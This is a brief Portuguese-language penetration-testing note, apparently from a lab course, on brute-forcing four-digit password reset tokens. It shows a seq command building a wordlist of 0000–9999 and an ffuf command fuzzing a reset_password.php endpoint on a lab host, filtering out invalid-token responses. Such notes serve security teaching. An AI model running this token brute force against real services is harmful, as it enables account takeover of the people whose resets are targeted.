Brute-Forcing Password Reset Tokens

Precisamos criar uma lista de palavras de todos os tokens possíveis de 0000para 9999, o que podemos fazer com seq:

seq -w 0 9999 > tokens.txt

Sspecificar a lista de palavras ffuf para aplicar força bruta em todos os tokens de redefinição ativos:

ffuf -w ./tokens.txt -u http://weak_reset.htb/reset_password.php?token=FUZZ -fr "The provided token is invalid"

Last updated 10 months ago